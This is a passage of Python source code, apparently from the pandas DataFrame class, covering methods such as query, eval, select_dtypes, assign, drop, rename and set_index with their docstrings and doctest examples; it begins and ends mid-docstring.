For further details and examples see the ``query`` documentation in
:ref:`indexing <indexing.query>`.
*Backtick quoted variables*
Backtick quoted variables are parsed as literal Python code and
are converted internally to a Python valid identifier.
This can lead to the following problems.
During parsing a number of disallowed characters inside the backtick
quoted string are replaced by strings that are allowed as a Python identifier.
These characters include all operators in Python, the space character, the
question mark, the exclamation mark, the dollar sign, and the euro sign.
For other characters that fall outside the ASCII range (U+0001..U+007F)
and those that are not further specified in PEP 3131,
the query parser will raise an error.
This excludes whitespace different than the space character,
but also the hashtag (as it is used for comments) and the backtick
itself (backtick can also not be escaped).
In a special case, quotes that make a pair around a backtick can
confuse the parser.
For example, ```it's` > `that's``` will raise an error,
as it forms a quoted string (``'s > `that'``) with a backtick inside.
See also the Python documentation about lexical analysis
(https://docs.python.org/3/reference/lexical_analysis.html)
in combination with the source code in :mod:`pandas.core.computation.parsing`.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 6),
... 'B': range(10, 0, -2),
... 'C C': range(10, 5, -1)})
>>> df
A B C C
0 1 10 10
1 2 8 9
2 3 6 8
3 4 4 7
4 5 2 6
>>> df.query('A > B')
A B C C
4 5 2 6
The previous expression is equivalent to
>>> df[df.A > df.B]
A B C C
4 5 2 6
For columns with spaces in their name, you can use backtick quoting.
>>> df.query('B == `C C`')
A B C C
0 1 10 10
The previous expression is equivalent to
>>> df[df.B == df['C C']]
A B C C
0 1 10 10
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if not isinstance(expr, str):
msg = f"expr must be a string to be evaluated, {type(expr)} given"
raise ValueError(msg)
kwargs["level"] = kwargs.pop("level", 0) + 1
kwargs["target"] = None
res = self.eval(expr, **kwargs)
try:
result = self.loc[res]
except ValueError:
# when res is multi-dimensional loc raises, but this is sometimes a
# valid query
result = self[res]
if inplace:
self._update_inplace(result)
else:
return result
def eval(self, expr, inplace=False, **kwargs):
"""
Evaluate a string describing operations on DataFrame columns.
Operates on columns only, not specific rows or elements. This allows
`eval` to run arbitrary code, which can make you vulnerable to code
injection if you pass user input to this function.
Parameters
----------
expr : str
The expression string to evaluate.
inplace : bool, default False
If the expression contains an assignment, whether to perform the
operation inplace and mutate the existing DataFrame. Otherwise,
a new DataFrame is returned.
**kwargs
See the documentation for :func:`eval` for complete details
on the keyword arguments accepted by
:meth:`~pandas.DataFrame.query`.
Returns
-------
ndarray, scalar, pandas object, or None
The result of the evaluation or None if ``inplace=True``.
See Also
--------
DataFrame.query : Evaluates a boolean expression to query the columns
of a frame.
DataFrame.assign : Can evaluate an expression or function to create new
values for a column.
eval : Evaluate a Python expression as a string using various
backends.
Notes
-----
For more details see the API documentation for :func:`~eval`.
For detailed examples see :ref:`enhancing performance with eval
<enhancingperf.eval>`.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 6), 'B': range(10, 0, -2)})
>>> df
A B
0 1 10
1 2 8
2 3 6
3 4 4
4 5 2
>>> df.eval('A + B')
0 11
1 10
2 9
3 8
4 7
dtype: int64
Assignment is allowed though by default the original DataFrame is not
modified.
>>> df.eval('C = A + B')
A B C
0 1 10 11
1 2 8 10
2 3 6 9
3 4 4 8
4 5 2 7
>>> df
A B
0 1 10
1 2 8
2 3 6
3 4 4
4 5 2
Use ``inplace=True`` to modify the original DataFrame.
>>> df.eval('C = A + B', inplace=True)
>>> df
A B C
0 1 10 11
1 2 8 10
2 3 6 9
3 4 4 8
4 5 2 7
Multiple columns can be assigned to using multi-line expressions:
>>> df.eval(
... '''
... C = A + B
... D = A - B
... '''
... )
A B C D
0 1 10 11 -9
1 2 8 10 -6
2 3 6 9 -3
3 4 4 8 0
4 5 2 7 3
"""
from pandas.core.computation.eval import eval as _eval
inplace = validate_bool_kwarg(inplace, "inplace")
resolvers = kwargs.pop("resolvers", None)
kwargs["level"] = kwargs.pop("level", 0) + 1
if resolvers is None:
index_resolvers = self._get_index_resolvers()
column_resolvers = self._get_cleaned_column_resolvers()
resolvers = column_resolvers, index_resolvers
if "target" not in kwargs:
kwargs["target"] = self
kwargs["resolvers"] = kwargs.get("resolvers", ()) + tuple(resolvers)
return _eval(expr, inplace=inplace, **kwargs)
def select_dtypes(self, include=None, exclude=None) -> DataFrame:
"""
Return a subset of the DataFrame's columns based on the column dtypes.
Parameters
----------
include, exclude : scalar or list-like
A selection of dtypes or strings to be included/excluded. At least
one of these parameters must be supplied.
Returns
-------
DataFrame
The subset of the frame including the dtypes in ``include`` and
excluding the dtypes in ``exclude``.
Raises
------
ValueError
* If both of ``include`` and ``exclude`` are empty
* If ``include`` and ``exclude`` have overlapping elements
* If any kind of string dtype is passed in.
See Also
--------
DataFrame.dtypes: Return Series with the data type of each column.
Notes
-----
* To select all *numeric* types, use ``np.number`` or ``'number'``
* To select strings you must use the ``object`` dtype, but note that
this will return *all* object dtype columns
* See the `numpy dtype hierarchy
<https://numpy.org/doc/stable/reference/arrays.scalars.html>`__
* To select datetimes, use ``np.datetime64``, ``'datetime'`` or
``'datetime64'``
* To select timedeltas, use ``np.timedelta64``, ``'timedelta'`` or
``'timedelta64'``
* To select Pandas categorical dtypes, use ``'category'``
* To select Pandas datetimetz dtypes, use ``'datetimetz'`` (new in
0.20.0) or ``'datetime64[ns, tz]'``
Examples
--------
>>> df = pd.DataFrame({'a': [1, 2] * 3,
... 'b': [True, False] * 3,
... 'c': [1.0, 2.0] * 3})
>>> df
a b c
0 1 True 1.0
1 2 False 2.0
2 1 True 1.0
3 2 False 2.0
4 1 True 1.0
5 2 False 2.0
>>> df.select_dtypes(include='bool')
b
0 True
1 False
2 True
3 False
4 True
5 False
>>> df.select_dtypes(include=['float64'])
c
0 1.0
1 2.0
2 1.0
3 2.0
4 1.0
5 2.0
>>> df.select_dtypes(exclude=['int64'])
b c
0 True 1.0
1 False 2.0
2 True 1.0
3 False 2.0
4 True 1.0
5 False 2.0
"""
if not is_list_like(include):
include = (include,) if include is not None else ()
if not is_list_like(exclude):
exclude = (exclude,) if exclude is not None else ()
selection = (frozenset(include), frozenset(exclude))
if not any(selection):
raise ValueError("at least one of include or exclude must be nonempty")
# convert the myriad valid dtypes object to a single representation
include = frozenset(infer_dtype_from_object(x) for x in include)
exclude = frozenset(infer_dtype_from_object(x) for x in exclude)
for dtypes in (include, exclude):
invalidate_string_dtypes(dtypes)
# can't both include AND exclude!
if not include.isdisjoint(exclude):
raise ValueError(f"include and exclude overlap on {(include & exclude)}")
# We raise when both include and exclude are empty
# Hence, we can just shrink the columns we want to keep
keep_these = np.full(self.shape[1], True)
def extract_unique_dtypes_from_dtypes_set(
dtypes_set: FrozenSet[Dtype], unique_dtypes: np.ndarray
) -> List[Dtype]:
extracted_dtypes = [
unique_dtype
for unique_dtype in unique_dtypes
# error: Argument 1 to "tuple" has incompatible type
# "FrozenSet[Union[ExtensionDtype, str, Any, Type[str],
# Type[float], Type[int], Type[complex], Type[bool]]]";
# expected "Iterable[Union[type, Tuple[Any, ...]]]"
if issubclass(
unique_dtype.type, tuple(dtypes_set) # type: ignore[arg-type]
)
]
return extracted_dtypes
unique_dtypes = self.dtypes.unique()
if include:
included_dtypes = extract_unique_dtypes_from_dtypes_set(
include, unique_dtypes
)
keep_these &= self.dtypes.isin(included_dtypes)
if exclude:
excluded_dtypes = extract_unique_dtypes_from_dtypes_set(
exclude, unique_dtypes
)
keep_these &= ~self.dtypes.isin(excluded_dtypes)
return self.iloc[:, keep_these.values]
def insert(self, loc, column, value, allow_duplicates=False) -> None:
"""
Insert column into DataFrame at specified location.
Raises a ValueError if `column` is already contained in the DataFrame,
unless `allow_duplicates` is set to True.
Parameters
----------
loc : int
Insertion index. Must verify 0 <= loc <= len(columns).
column : str, number, or hashable object
Label of the inserted column.
value : int, Series, or array-like
allow_duplicates : bool, optional
"""
if allow_duplicates and not self.flags.allows_duplicate_labels:
raise ValueError(
"Cannot specify 'allow_duplicates=True' when "
"'self.flags.allows_duplicate_labels' is False."
)
self._ensure_valid_index(value)
value = self._sanitize_column(column, value, broadcast=False)
self._mgr.insert(loc, column, value, allow_duplicates=allow_duplicates)
def assign(self, **kwargs) -> DataFrame:
r"""
Assign new columns to a DataFrame.
Returns a new object with all original columns in addition to new ones.
Existing columns that are re-assigned will be overwritten.
Parameters
----------
**kwargs : dict of {str: callable or Series}
The column names are keywords. If the values are
callable, they are computed on the DataFrame and
assigned to the new columns. The callable must not
change input DataFrame (though pandas doesn't check it).
If the values are not callable, (e.g. a Series, scalar, or array),
they are simply assigned.
Returns
-------
DataFrame
A new DataFrame with the new columns in addition to
all the existing columns.
Notes
-----
Assigning multiple columns within the same ``assign`` is possible.
Later items in '\*\*kwargs' may refer to newly created or modified
columns in 'df'; items are computed and assigned into 'df' in order.
Examples
--------
>>> df = pd.DataFrame({'temp_c': [17.0, 25.0]},
... index=['Portland', 'Berkeley'])
>>> df
temp_c
Portland 17.0
Berkeley 25.0
Where the value is a callable, evaluated on `df`:
>>> df.assign(temp_f=lambda x: x.temp_c * 9 / 5 + 32)
temp_c temp_f
Portland 17.0 62.6
Berkeley 25.0 77.0
Alternatively, the same behavior can be achieved by directly
referencing an existing Series or sequence:
>>> df.assign(temp_f=df['temp_c'] * 9 / 5 + 32)
temp_c temp_f
Portland 17.0 62.6
Berkeley 25.0 77.0
You can create multiple columns within the same assign where one
of the columns depends on another one defined within the same assign:
>>> df.assign(temp_f=lambda x: x['temp_c'] * 9 / 5 + 32,
... temp_k=lambda x: (x['temp_f'] + 459.67) * 5 / 9)
temp_c temp_f temp_k
Portland 17.0 62.6 290.15
Berkeley 25.0 77.0 298.15
"""
data = self.copy()
for k, v in kwargs.items():
data[k] = com.apply_if_callable(v, data)
return data
def _sanitize_column(self, key, value, broadcast=True):
"""
Ensures new columns (which go into the BlockManager as new blocks) are
always copied and converted into an array.
Parameters
----------
key : object
value : scalar, Series, or array-like
broadcast : bool, default True
If ``key`` matches multiple duplicate column names in the
DataFrame, this parameter indicates whether ``value`` should be
tiled so that the returned array contains a (duplicated) column for
each occurrence of the key. If False, ``value`` will not be tiled.
Returns
-------
numpy.ndarray
"""
def reindexer(value):
# reindex if necessary
if value.index.equals(self.index) or not len(self.index):
value = value._values.copy()
else:
# GH 4107
try:
value = value.reindex(self.index)._values
except ValueError as err:
# raised in MultiIndex.from_tuples, see test_insert_error_msmgs
if not value.index.is_unique:
# duplicate axis
raise err
# other
raise TypeError(
"incompatible index of inserted column with frame index"
) from err
return value
if isinstance(value, Series):
value = reindexer(value)
elif isinstance(value, DataFrame):
# align right-hand-side columns if self.columns
# is multi-index and self[key] is a sub-frame
if isinstance(self.columns, MultiIndex) and key in self.columns:
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
cols = maybe_droplevels(self.columns[loc], key)
if len(cols) and not cols.equals(value.columns):
value = value.reindex(cols, axis=1)
# now align rows
value = reindexer(value).T
elif isinstance(value, ExtensionArray):
# Explicitly copy here, instead of in sanitize_index,
# as sanitize_index won't copy an EA, even with copy=True
value = value.copy()
value = sanitize_index(value, self.index)
elif isinstance(value, Index) or is_sequence(value):
# turn me into an ndarray
value = sanitize_index(value, self.index)
if not isinstance(value, (np.ndarray, Index)):
if isinstance(value, list) and len(value) > 0:
value = maybe_convert_platform(value)
else:
value = com.asarray_tuplesafe(value)
elif value.ndim == 2:
value = value.copy().T
elif isinstance(value, Index):
value = value.copy(deep=True)
else:
value = value.copy()
# possibly infer to datetimelike
if is_object_dtype(value.dtype):
value = maybe_infer_to_datetimelike(value)
else:
# cast ignores pandas dtypes. so save the dtype first
infer_dtype, _ = infer_dtype_from_scalar(value, pandas_dtype=True)
# upcast
if is_extension_array_dtype(infer_dtype):
value = construct_1d_arraylike_from_scalar(
value, len(self.index), infer_dtype
)
else:
value = cast_scalar_to_array(len(self.index), value)
value = maybe_cast_to_datetime(value, infer_dtype)
# return internal types directly
if is_extension_array_dtype(value):
return value
# broadcast across multiple columns if necessary
if broadcast and key in self.columns and value.ndim == 1:
if not self.columns.is_unique or isinstance(self.columns, MultiIndex):
existing_piece = self[key]
if isinstance(existing_piece, DataFrame):
value = np.tile(value, (len(existing_piece.columns), 1))
return np.atleast_2d(np.asarray(value))
@property
def _series(self):
return {
item: Series(
self._mgr.iget(idx), index=self.index, name=item, fastpath=True
)
for idx, item in enumerate(self.columns)
}
def lookup(self, row_labels, col_labels) -> np.ndarray:
"""
Label-based "fancy indexing" function for DataFrame.
Given equal-length arrays of row and column labels, return an
array of the values corresponding to each (row, col) pair.
.. deprecated:: 1.2.0
DataFrame.lookup is deprecated,
use DataFrame.melt and DataFrame.loc instead.
For an example see :meth:`~pandas.DataFrame.lookup`
in the user guide.
Parameters
----------
row_labels : sequence
The row labels to use for lookup.
col_labels : sequence
The column labels to use for lookup.
Returns
-------
numpy.ndarray
The found values.
"""
msg = (
"The 'lookup' method is deprecated and will be"
"removed in a future version."
"You can use DataFrame.melt and DataFrame.loc"
"as a substitute."
)
warnings.warn(msg, FutureWarning, stacklevel=2)
n = len(row_labels)
if n != len(col_labels):
raise ValueError("Row labels must have same size as column labels")
if not (self.index.is_unique and self.columns.is_unique):
# GH#33041
raise ValueError("DataFrame.lookup requires unique index and columns")
thresh = 1000
if not self._is_mixed_type or n > thresh:
values = self.values
ridx = self.index.get_indexer(row_labels)
cidx = self.columns.get_indexer(col_labels)
if (ridx == -1).any():
raise KeyError("One or more row labels was not found")
if (cidx == -1).any():
raise KeyError("One or more column labels was not found")
flat_index = ridx * len(self.columns) + cidx
result = values.flat[flat_index]
else:
result = np.empty(n, dtype="O")
for i, (r, c) in enumerate(zip(row_labels, col_labels)):
result[i] = self._get_value(r, c)
if is_object_dtype(result):
result = lib.maybe_convert_objects(result)
return result
# ----------------------------------------------------------------------
# Reindexing and alignment
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value, copy):
frame = self
columns = axes["columns"]
if columns is not None:
frame = frame._reindex_columns(
columns, method, copy, level, fill_value, limit, tolerance
)
index = axes["index"]
if index is not None:
frame = frame._reindex_index(
index, method, copy, level, fill_value, limit, tolerance
)
return frame
def _reindex_index(
self,
new_index,
method,
copy,
level,
fill_value=np.nan,
limit=None,
tolerance=None,
):
new_index, indexer = self.index.reindex(
new_index, method=method, level=level, limit=limit, tolerance=tolerance
)
return self._reindex_with_indexers(
{0: [new_index, indexer]},
copy=copy,
fill_value=fill_value,
allow_dups=False,
)
def _reindex_columns(
self,
new_columns,
method,
copy,
level,
fill_value=None,
limit=None,
tolerance=None,
):
new_columns, indexer = self.columns.reindex(
new_columns, method=method, level=level, limit=limit, tolerance=tolerance
)
return self._reindex_with_indexers(
{1: [new_columns, indexer]},
copy=copy,
fill_value=fill_value,
allow_dups=False,
)
def _reindex_multi(self, axes, copy, fill_value) -> DataFrame:
"""
We are guaranteed non-Nones in the axes.
"""
new_index, row_indexer = self.index.reindex(axes["index"])
new_columns, col_indexer = self.columns.reindex(axes["columns"])
if row_indexer is not None and col_indexer is not None:
indexer = row_indexer, col_indexer
new_values = algorithms.take_2d_multi(
self.values, indexer, fill_value=fill_value
)
return self._constructor(new_values, index=new_index, columns=new_columns)
else:
return self._reindex_with_indexers(
{0: [new_index, row_indexer], 1: [new_columns, col_indexer]},
copy=copy,
fill_value=fill_value,
)
@doc(NDFrame.align, **_shared_doc_kwargs)
def align(
self,
other,
join="outer",
axis=None,
level=None,
copy=True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
broadcast_axis=None,
) -> DataFrame:
return super().align(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis,
)
@Appender(
"""
Examples
--------
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
Change the row labels.
>>> df.set_axis(['a', 'b', 'c'], axis='index')
A B
a 1 4
b 2 5
c 3 6
Change the column labels.
>>> df.set_axis(['I', 'II'], axis='columns')
I II
0 1 4
1 2 5
2 3 6
Now, update the labels inplace.
>>> df.set_axis(['i', 'ii'], axis='columns', inplace=True)
>>> df
i ii
0 1 4
1 2 5
2 3 6
"""
)
@Substitution(
**_shared_doc_kwargs,
extended_summary_sub=" column or",
axis_description_sub=", and 1 identifies the columns",
see_also_sub=" or columns",
)
@Appender(NDFrame.set_axis.__doc__)
def set_axis(self, labels, axis: Axis = 0, inplace: bool = False):
return super().set_axis(labels, axis=axis, inplace=inplace)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.reindex.__doc__)
@rewrite_axis_style_signature(
"labels",
[
("method", None),
("copy", True),
("level", None),
("fill_value", np.nan),
("limit", None),
("tolerance", None),
],
)
def reindex(self, *args, **kwargs) -> DataFrame:
axes = validate_axis_style_args(self, args, kwargs, "labels", "reindex")
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop("axis", None)
kwargs.pop("labels", None)
return super().reindex(**kwargs)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace=False,
errors="raise",
):
"""
Drop specified labels from rows or columns.
Remove rows or columns by specifying label names and corresponding
axis, or by specifying directly index or column names. When using a
multi-index, labels on different levels can be removed by specifying
the level.
Parameters
----------
labels : single label or list-like
Index or column labels to drop.
axis : {0 or 'index', 1 or 'columns'}, default 0
Whether to drop labels from the index (0 or 'index') or
columns (1 or 'columns').
index : single label or list-like
Alternative to specifying axis (``labels, axis=0``
is equivalent to ``index=labels``).
columns : single label or list-like
Alternative to specifying axis (``labels, axis=1``
is equivalent to ``columns=labels``).
level : int or level name, optional
For MultiIndex, level from which the labels will be removed.
inplace : bool, default False
If False, return a copy. Otherwise, do operation
inplace and return None.
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and only existing labels are
dropped.
Returns
-------
DataFrame or None
DataFrame without the removed index or column labels or
None if ``inplace=True``.
Raises
------
KeyError
If any of the labels is not found in the selected axis.
See Also
--------
DataFrame.loc : Label-location based indexer for selection by label.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing.
DataFrame.drop_duplicates : Return DataFrame with duplicate rows
removed, optionally only considering certain columns.
Series.drop : Return Series with specified index labels removed.
Examples
--------
>>> df = pd.DataFrame(np.arange(12).reshape(3, 4),
... columns=['A', 'B', 'C', 'D'])
>>> df
A B C D
0 0 1 2 3
1 4 5 6 7
2 8 9 10 11
Drop columns
>>> df.drop(['B', 'C'], axis=1)
A D
0 0 3
1 4 7
2 8 11
>>> df.drop(columns=['B', 'C'])
A D
0 0 3
1 4 7
2 8 11
Drop a row by index
>>> df.drop([0, 1])
A B C D
2 8 9 10 11
Drop columns and/or rows of MultiIndex DataFrame
>>> midx = pd.MultiIndex(levels=[['lama', 'cow', 'falcon'],
... ['speed', 'weight', 'length']],
... codes=[[0, 0, 0, 1, 1, 1, 2, 2, 2],
... [0, 1, 2, 0, 1, 2, 0, 1, 2]])
>>> df = pd.DataFrame(index=midx, columns=['big', 'small'],
... data=[[45, 30], [200, 100], [1.5, 1], [30, 20],
... [250, 150], [1.5, 0.8], [320, 250],
... [1, 0.8], [0.3, 0.2]])
>>> df
big small
lama speed 45.0 30.0
weight 200.0 100.0
length 1.5 1.0
cow speed 30.0 20.0
weight 250.0 150.0
length 1.5 0.8
falcon speed 320.0 250.0
weight 1.0 0.8
length 0.3 0.2
>>> df.drop(index='cow', columns='small')
big
lama speed 45.0
weight 200.0
length 1.5
falcon speed 320.0
weight 1.0
length 0.3
>>> df.drop(index='length', level=1)
big small
lama speed 45.0 30.0
weight 200.0 100.0
cow speed 30.0 20.0
weight 250.0 150.0
falcon speed 320.0 250.0
weight 1.0 0.8
"""
return super().drop(
labels=labels,
axis=axis,
index=index,
columns=columns,
level=level,
inplace=inplace,
errors=errors,
)
@rewrite_axis_style_signature(
"mapper",
[("copy", True), ("inplace", False), ("level", None), ("errors", "ignore")],
)
def rename(
self,
mapper: Optional[Renamer] = None,
*,
index: Optional[Renamer] = None,
columns: Optional[Renamer] = None,
axis: Optional[Axis] = None,
copy: bool = True,
inplace: bool = False,
level: Optional[Level] = None,
errors: str = "ignore",
) -> Optional[DataFrame]:
"""
Alter axes labels.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
mapper : dict-like or function
Dict-like or function transformations to apply to
that axis' values. Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index`` and
``columns``.
index : dict-like or function
Alternative to specifying axis (``mapper, axis=0``
is equivalent to ``index=mapper``).
columns : dict-like or function
Alternative to specifying axis (``mapper, axis=1``
is equivalent to ``columns=mapper``).
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis to target with ``mapper``. Can be either the axis name
('index', 'columns') or number (0, 1). The default is 'index'.
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Whether to return a new DataFrame. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
errors : {'ignore', 'raise'}, default 'ignore'
If 'raise', raise a `KeyError` when a dict-like `mapper`, `index`,
or `columns` contains labels that are not present in the Index
being transformed.
If 'ignore', existing keys will be renamed and extra keys will be
ignored.
Returns
-------
DataFrame or None
DataFrame with the renamed axis labels or None if ``inplace=True``.
Raises
------
KeyError
If any of the labels is not found in the selected axis and
"errors='raise'".
See Also
--------
DataFrame.rename_axis : Set the name of the axis.
Examples
--------
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
Rename columns using a mapping:
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
Rename index using a mapping:
>>> df.rename(index={0: "x", 1: "y", 2: "z"})
A B
x 1 4
y 2 5
z 3 6
Cast index labels to a different type:
>>> df.index
RangeIndex(start=0, stop=3, step=1)
>>> df.rename(index=str).index
Index(['0', '1', '2'], dtype='object')
>>> df.rename(columns={"A": "a", "B": "b", "C": "c"}, errors="raise")
Traceback (most recent call last):
KeyError: ['C'] not found in axis
Using axis-style parameters:
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
"""
return super().rename(
mapper=mapper,
index=index,
columns=columns,
axis=axis,
copy=copy,
inplace=inplace,
level=level,
errors=errors,
)
@doc(NDFrame.fillna, **_shared_doc_kwargs)
def fillna(
self,
value=None,
method=None,
axis=None,
inplace=False,
limit=None,
downcast=None,
) -> Optional[DataFrame]:
return super().fillna(
value=value,
method=method,
axis=axis,
inplace=inplace,
limit=limit,
downcast=downcast,
)
def pop(self, item: Label) -> Series:
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : label
Label of column to be popped.
Returns
-------
Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
return super().pop(item=item)
@doc(NDFrame.replace, **_shared_doc_kwargs)
def replace(
self,
to_replace=None,
value=None,
inplace=False,
limit=None,
regex=False,
method="pad",
):
return super().replace(
to_replace=to_replace,
value=value,
inplace=inplace,
limit=limit,
regex=regex,
method=method,
)
def _replace_columnwise(
self, mapping: Dict[Label, Tuple[Any, Any]], inplace: bool, regex
):
"""
Dispatch to Series.replace column-wise.
Parameters
----------
mapping : dict
of the form {col: (target, value)}
inplace : bool
regex : bool or same types as `to_replace` in DataFrame.replace
Returns
-------
DataFrame or None
"""
# Operate column-wise
res = self if inplace else self.copy()
ax = self.columns
for i in range(len(ax)):
if ax[i] in mapping:
ser = self.iloc[:, i]
target, value = mapping[ax[i]]
newobj = ser.replace(target, value, regex=regex)
res.iloc[:, i] = newobj
if inplace:
return
return res.__finalize__(self)
@doc(NDFrame.shift, klass=_shared_doc_kwargs["klass"])
def shift(
self, periods=1, freq=None, axis=0, fill_value=lib.no_default
) -> DataFrame:
axis = self._get_axis_number(axis)
ncols = len(self.columns)
if axis == 1 and periods != 0 and fill_value is lib.no_default and ncols > 0:
# We will infer fill_value to match the closest column
if periods > 0:
result = self.iloc[:, :-periods]
for col in range(min(ncols, abs(periods))):
# TODO(EA2D): doing this in a loop unnecessary with 2D EAs
# Define filler inside loop so we get a copy
filler = self.iloc[:, 0].shift(len(self))
result.insert(0, col, filler, allow_duplicates=True)
else:
result = self.iloc[:, -periods:]
for col in range(min(ncols, abs(periods))):
# Define filler inside loop so we get a copy
filler = self.iloc[:, -1].shift(len(self))
result.insert(
len(result.columns), col, filler, allow_duplicates=True
)
result.columns = self.columns.copy()
return result
return super().shift(
periods=periods, freq=freq, axis=axis, fill_value=fill_value
)
def set_index(
self, keys, drop=True, append=False, inplace=False, verify_integrity=False
):
"""
Set the DataFrame index using existing columns.
Set the DataFrame index (row labels) using one or more existing
columns or arrays (of the correct length). The index can replace the
existing index or expand on it.
Parameters
----------
keys : label or array-like or list of labels/arrays
This parameter can be either a single column key, a single array of
the same length as the calling DataFrame, or a list containing an
arbitrary combination of column keys and arrays. Here, "array"
encompasses :class:`Series`, :class:`Index`, ``np.ndarray``, and
instances of :class:`~collections.abc.Iterator`.
drop : bool, default True
Delete columns to be used as the new index.
append : bool, default False
Whether to append columns to existing index.
inplace : bool, default False
Modify the DataFrame in place (do not create a new object).
verify_integrity : bool, default False
Check the new index for duplicates. Otherwise defer the check until
necessary. Setting to False will improve the performance of this
method.
Returns
-------
DataFrame or None
Changed row labels or None if ``inplace=True``.
See Also
--------
DataFrame.reset_index : Opposite of set_index.
DataFrame.reindex : Change to new indices or expand indices.
DataFrame.reindex_like : Change to same indices as other DataFrame.
Examples
--------
>>> df = pd.DataFrame({'month': [1, 4, 7, 10],
... 'year': [2012, 2014, 2013, 2014],
... 'sale': [55, 40, 84, 31]})
>>> df
month year sale
0 1 2012 55
1 4 2014 40
2 7 2013 84
3 10 2014 31
Set the index to become the 'month' column:
>>> df.set_index('month')
year sale
month
1 2012 55
4 2014 40
7 2013 84
10 2014 31
Create a MultiIndex using columns 'year' and 'month':
>>> df.set_index(['year', 'month'])
sale
year month
2012 1 55
2014 4 40
2013 7 84
2014 10 31
Create a MultiIndex using an Index and a column:
>>> df.set_index([pd.Index([1, 2, 3, 4]), 'year'])
month sale
year
1 2012 1 55
2 2014 4 40
3 2013 7 84
4 2014 10 31
Create a MultiIndex using two Series:
>>> s = pd.Series([1, 2, 3, 4])
>>> df.set_index([s, s**2])
month year sale
1 1 1 2012 55
2 4 4 2014 40
3 9 7 2013 84
4 16 10 2014 31
"""
inplace = validate_bool_kwarg(inplace, "inplace")
self._check_inplace_and_allows_duplicate_labels(inplace)
if not isinstance(keys, list):
keys = [keys]
err_msg = (
'The parameter "keys" may be a column key, one-dimensional '
"array, or a list containing only valid column keys and "
"one-dimensional arrays."
)
missing: List[Label] = []
for col in keys:
if isinstance(col, (Index, Series, np.ndarray, list, abc.Iterator)):
# arrays are fine as long as they are one-dimensional
# iterators get converted to list below
if getattr(col, "ndim", 1) != 1:
raise ValueError(err_msg)
else:
# everything else gets tried as a key; see GH 24969
try:
found = col in self.columns
except TypeError as err:
raise TypeError(
f"{err_msg}. Received column of type {type(col)}"
) from err
else:
if not found:
missing.append(col)
if missing:
raise KeyError(f"None of {missing} are in the columns")
if inplace:
frame = self
else:
frame = self.copy()
arrays = []
names: List[Label] = []
if append:
names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i in range(self.index.nlevels):
arrays.append(self.index._get_level_values(i))
else:
arrays.append(self.index)
to_remove: List[Label] = []
for col in keys:
if isinstance(col, MultiIndex):
for n in range(col.nlevels):
arrays.append(col._get_level_values(n))
names.extend(col.names)
elif isinstance(col, (Index, Series)):
# if Index then not MultiIndex (treated above)
arrays.append(col)
names.append(col.name)
elif isinstance(col, (list, np.ndarray)):
arrays.append(col)
names.append(None)
elif isinstance(col, abc.Iterator):
arrays.append(list(col))
names.append(None)
# from here, col can only be a column label
else:
arrays.append(frame[col]._values)
names.append(col)
if drop:
to_remove.append(col)
if len(arrays[-1]) != len(self):
# check newest element against length of calling frame, since
# ensure_index_from_sequences would not raise for append=False.
raise ValueError(
f"Length mismatch: Expected {len(self)} rows, "
f"received array of length {len(arrays[-1])}"
)
index = ensure_index_from_sequences(arrays, names)
if verify_integrity and not index.is_unique:
duplicates = index[index.duplicated()].unique()
raise ValueError(f"Index has duplicate keys: {duplicates}")
# use set to handle duplicate column names gracefully in case of drop
for c in set(to_remove):
del frame[c]
# clear up memory usage
index._cleanup()
frame.index = index
if not inplace:
return frame
def reset_index(
self,
level: Optional[Union[Hashable, Sequence[Hashable]]] = None,
drop: bool = False,
inplace: bool = False,
col_level: Hashable = 0,
col_fill: Label = "",
) -> Optional[DataFrame]:
"""
Reset the index, or a level of it.
Reset the index of the DataFrame, and use the default one instead.
If the DataFrame has a MultiIndex, this method can remove one or more
levels.
Parameters
----------
level : int, str, tuple, or list, default None
Only remove the given levels from the index. Removes all levels by
default.
drop : bool, default False
Do not try to insert index into dataframe columns. This resets
the index to the default integer index.
inplace : bool, default False
Modify the DataFrame in place (do not create a new object).
col_level : int or str, default 0
If the columns have multiple levels, determines which level the
labels are inserted into. By default it is inserted into the first
level.
